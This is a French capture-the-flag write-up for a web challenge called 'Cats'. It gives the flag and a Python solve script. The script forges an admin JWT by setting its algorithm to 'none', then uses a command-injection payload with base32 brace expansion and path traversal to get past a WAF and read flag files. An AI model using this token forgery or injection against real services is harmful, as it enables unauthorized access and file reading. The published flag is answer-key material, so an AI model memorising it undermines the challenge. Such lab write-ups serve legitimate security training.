# Cats


## Consignes :


Hack the unhackable !
Url : http://IP:8080/993d546fc964016893047bc510dbfcc3/


## Points attribués :
```
30 Points
```

## Flag :
```
Fl@g{ede7f1db2a7a547924553765ef88eae6}
```


## Déroulé :

Il s'agit dans un premier temps de bypass jwt en utilisant l'algorithme à none puis de bypass le WAF via injection de commande.

```
#!/usr/bin/env python3
import requests
import base64
import json
import binascii

def fixup(adict, k, v):
    for key in adict.keys():
        if key == k:
            adict[key] = v
    return adict

print ("[*]Trying to bypass login jwt!")


#r = requests.get('http://127.0.0.1:8086/login.php?guest')
r = requests.get('http://192.168.120.1:8086/login.php?guest')

for c in r.cookies:
    auth = c.value
    #print (auth)
    #print (type(auth.encode('utf-8')))

bypass_sig = b"eyJ0eXAiOiJKV1QiLCJhbGciOiJOb25lIn0="
#bypass_admin_check = base64.b64decode(auth.split('.')[1]+ b"==")
res = (auth.split('.')[1]).encode('utf-8')
bypass_admin_check = base64.b64decode(res+b"==")

#bypass_admin_check = json.dumps(fixup(json.loads(bypass_admin_check), b'usr', b'admin'))
bypass_admin_check = json.dumps(fixup(json.loads(bypass_admin_check), 'usr', 'admin'))

#print ("bypass_admin_check")
#print (bypass_admin_check)
bypass_admin_check = bypass_admin_check.encode('utf-8')
#print (type(bypass_admin_check))

#print (base64.b64encode(bypass_admin_check))
#print (base64.b64encode(bypass_admin_check).decode('utf-8'))
res = (base64.b64encode(bypass_admin_check).decode('utf-8'))


cookies = {
  'auth': bypass_sig.decode('utf-8')+'.'+(base64.b64encode(bypass_admin_check)).decode('utf-8')+'.ewkQAj0KIv8rBxO7CPUop8tDYwXt7kayZXXvHTqBTiE',
}

#print (cookies)

response = requests.get('http://192.168.120.1:8086/login.php', cookies=cookies)
if b"Admin" in response.content:
    print ("[*]bypass done!")


flag = ""
for i in range(1,7):
    response = requests.get('http://192.168.120.1:8086/f79502ca93031a468fa03a09a10f7cb7.php?cmd={base32,../../../../FLAG'+str(i)+'}', cookies=cookies)
    res = (response.content.split(b'<br>')[0])
    res = base64.b32decode(res)
    res =  (res.decode('utf-8').rstrip())
    flag += res

print()
print ("[*]Get your flag :D!")
print (flag)

```